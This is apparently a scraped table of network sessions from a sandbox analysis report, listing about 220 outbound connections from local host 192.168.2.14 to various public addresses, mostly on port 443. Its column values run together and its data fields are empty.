                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15862192.168.2.1446342199.57.172.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15863192.168.2.145941414.191.120.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15864192.168.2.1444376210.39.179.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15865192.168.2.1437750206.214.123.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15866192.168.2.145990053.181.148.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15867192.168.2.1437674109.194.190.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15868192.168.2.1457198181.53.187.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15869192.168.2.1460574162.67.141.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15870192.168.2.144196054.186.252.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15871192.168.2.143948883.116.156.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15872192.168.2.143282439.22.134.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15873192.168.2.1451716175.99.20.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15874192.168.2.145022818.219.135.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15875192.168.2.1459864143.220.159.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15876192.168.2.1452366119.100.101.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15877192.168.2.144045441.35.46.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15878192.168.2.1459710163.115.80.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15879192.168.2.143467892.53.181.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15880192.168.2.144593495.88.224.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15881192.168.2.1454302198.192.240.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15882192.168.2.144668892.136.105.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15883192.168.2.1437422168.32.70.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15884192.168.2.1450466117.141.61.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15885192.168.2.1448960142.49.111.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15886192.168.2.143343861.172.139.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15887192.168.2.144834212.22.191.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15888192.168.2.143354266.27.127.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15889192.168.2.1434350164.75.22.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15890192.168.2.145566076.19.109.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15891192.168.2.1452900182.165.245.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15892192.168.2.143372641.75.98.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15893192.168.2.146024849.112.148.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15894192.168.2.1458980138.107.113.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15895192.168.2.144265239.6.151.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15896192.168.2.144080277.29.228.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15897192.168.2.145467412.217.55.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15898192.168.2.1447624222.237.11.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15899192.168.2.1447852139.63.139.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15900192.168.2.1459326180.235.89.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15901192.168.2.1459360223.148.195.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15902192.168.2.14474145.255.121.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15903192.168.2.1453740161.220.237.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15904192.168.2.1439634116.22.33.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15905192.168.2.145511480.205.162.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15906192.168.2.1454242208.89.93.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15907192.168.2.1448288218.30.39.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15908192.168.2.1443310177.200.209.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15909192.168.2.1443308141.255.8.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15910192.168.2.143338894.146.18.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15911192.168.2.1447796210.140.186.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15912192.168.2.143475892.122.189.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15913192.168.2.1453610200.0.21.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15914192.168.2.145683293.144.222.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15915192.168.2.1458804170.241.136.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15916192.168.2.1458022108.211.177.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15917192.168.2.145540899.163.24.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15918192.168.2.14355029.80.252.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15919192.168.2.1451240160.241.39.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15920192.168.2.1444394100.8.63.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15921192.168.2.1460902159.93.62.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15922192.168.2.1441450208.104.91.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15923192.168.2.144146470.58.97.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15924192.168.2.143837431.232.10.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15925192.168.2.1453062117.154.203.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15926192.168.2.144688640.133.154.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15927192.168.2.1441566192.185.20.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15928192.168.2.1454398193.105.141.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15929192.168.2.145603440.240.20.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15930192.168.2.144531661.247.113.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15931192.168.2.1436078150.7.144.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15932192.168.2.146084481.28.80.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15933192.168.2.144134214.229.250.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15934192.168.2.1460410103.144.187.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15935192.168.2.1434972203.172.157.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15936192.168.2.14412109.215.41.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15937192.168.2.1438826160.63.191.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15938192.168.2.144617253.102.51.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15939192.168.2.144775867.66.212.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15940192.168.2.1453594149.228.0.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15941192.168.2.144499098.164.133.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15942192.168.2.1434818114.242.133.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15943192.168.2.1450800209.224.146.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15944192.168.2.145314890.214.138.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15945192.168.2.145021498.39.253.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15946192.168.2.1452026167.52.190.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15947192.168.2.1435364187.238.234.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15948192.168.2.1444934188.107.229.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15949192.168.2.1459714151.254.86.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15950192.168.2.1440024173.215.0.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15951192.168.2.1437138107.29.166.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15952192.168.2.145404495.94.117.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15953192.168.2.1451074124.202.132.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15954192.168.2.1453740223.53.213.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15955192.168.2.14553469.232.243.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15956192.168.2.143448072.128.143.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15957192.168.2.143523896.239.249.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15958192.168.2.1444922141.207.61.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15959192.168.2.145869459.119.40.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15960192.168.2.145904640.81.148.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15961192.168.2.1456450118.58.50.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15962192.168.2.1435514199.53.13.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15963192.168.2.1453458209.153.192.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15964192.168.2.144115452.64.61.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15965192.168.2.143407459.134.98.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15966192.168.2.1451212103.218.41.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15967192.168.2.1441414184.33.53.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15968192.168.2.144528639.69.206.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15969192.168.2.143390634.196.206.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15970192.168.2.144725432.61.150.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15971192.168.2.14362524.171.28.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15972192.168.2.143515836.38.248.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15973192.168.2.144041644.134.9.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15974192.168.2.144502467.32.171.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15975192.168.2.143558298.162.3.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15976192.168.2.1445442156.174.104.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15977192.168.2.143900283.196.15.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15978192.168.2.144588662.97.36.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15979192.168.2.143861440.178.254.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15980192.168.2.1436920165.199.123.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15981192.168.2.1449604195.111.189.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15982192.168.2.144622474.170.40.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15983192.168.2.144174246.116.103.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15984192.168.2.1452818210.28.203.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15985192.168.2.143378288.17.255.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15986192.168.2.1443806102.94.205.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15987192.168.2.1439316172.38.104.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15988192.168.2.1440942120.255.94.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15989192.168.2.144207488.162.63.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15990192.168.2.1457938192.222.29.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15991192.168.2.1440440164.115.93.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15992192.168.2.1441352166.234.66.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15993192.168.2.1435294139.83.65.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15994192.168.2.1452994109.23.179.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15995192.168.2.1451748222.113.189.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15996192.168.2.1442446164.103.5.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15997192.168.2.1454498112.240.130.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15998192.168.2.1440684142.178.48.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      15999192.168.2.1457802222.130.40.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16000192.168.2.1459000131.136.60.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16001192.168.2.14500108.92.141.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16002192.168.2.1455086185.223.67.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16003192.168.2.145485618.140.242.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16004192.168.2.143366064.186.204.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16005192.168.2.1452956161.83.246.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16006192.168.2.143306079.176.135.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16007192.168.2.1445464122.98.210.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16008192.168.2.145989248.121.112.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16009192.168.2.144846249.145.49.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16010192.168.2.1437412124.51.170.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16011192.168.2.1446560191.40.211.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16012192.168.2.144755296.21.173.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16013192.168.2.1458218153.81.86.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16014192.168.2.1437134152.19.69.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16015192.168.2.144128267.61.233.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16016192.168.2.1433164132.37.212.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16017192.168.2.1440636206.184.59.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16018192.168.2.14557609.191.206.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16019192.168.2.144476419.44.102.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16020192.168.2.1442950144.109.218.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16021192.168.2.1438540146.206.111.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16022192.168.2.1435626121.146.93.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16023192.168.2.145325697.131.163.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16024192.168.2.144946424.195.97.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16025192.168.2.145871686.125.68.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16026192.168.2.144930467.168.112.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16027192.168.2.1451460220.133.190.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16028192.168.2.1443232106.150.21.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16029192.168.2.1442242155.81.133.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16030192.168.2.145938670.104.77.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16031192.168.2.1450106169.146.78.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16032192.168.2.1458360190.198.233.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16033192.168.2.1457464156.147.220.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16034192.168.2.1440124129.253.71.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16035192.168.2.14544828.250.103.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16036192.168.2.1454610191.11.88.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16037192.168.2.1448072152.67.19.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16038192.168.2.1454920144.64.215.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16039192.168.2.1448812100.156.77.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16040192.168.2.145908889.30.53.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16041192.168.2.1445498209.12.216.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16042192.168.2.1460114188.181.12.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16043192.168.2.1439192200.179.181.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16044192.168.2.1455984153.14.42.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16045192.168.2.1444006104.20.250.958080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16046192.168.2.143604669.253.42.1678080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16047192.168.2.1432772118.100.235.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16048192.168.2.1460648104.3.90.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16049192.168.2.144360650.223.156.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16050192.168.2.143880232.171.164.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16051192.168.2.145652468.165.98.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16052192.168.2.1432964151.85.148.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16053192.168.2.144752024.39.135.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16054192.168.2.145901294.63.88.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16055192.168.2.1440056212.139.34.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16056192.168.2.144896618.18.168.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16057192.168.2.1432794162.20.38.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16058192.168.2.1459832194.106.251.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16059192.168.2.1455882200.79.253.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16060192.168.2.145732644.112.150.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16061192.168.2.1443274195.39.3.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16062192.168.2.145056857.50.189.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16063192.168.2.1438404187.73.15.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16064192.168.2.144904838.171.162.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16065192.168.2.1460408168.53.233.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16066192.168.2.1452080112.109.101.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16067192.168.2.144628244.102.138.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16068192.168.2.1440134169.221.53.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16069192.168.2.1460742105.24.231.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16070192.168.2.144709442.254.127.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16071192.168.2.1445934154.221.39.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16072192.168.2.1454450222.230.7.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16073192.168.2.145057649.67.98.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16074192.168.2.1456886143.177.68.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16075192.168.2.145866239.56.66.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16076192.168.2.1457516118.77.38.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16077192.168.2.143809058.185.74.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16078192.168.2.1454488131.79.254.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16079192.168.2.1444170159.255.147.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16080192.168.2.1451884107.166.164.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16081192.168.2.1455994119.195.230.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16082192.168.2.143983270.195.103.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      16083192.168.2.145650231.227.160.239443
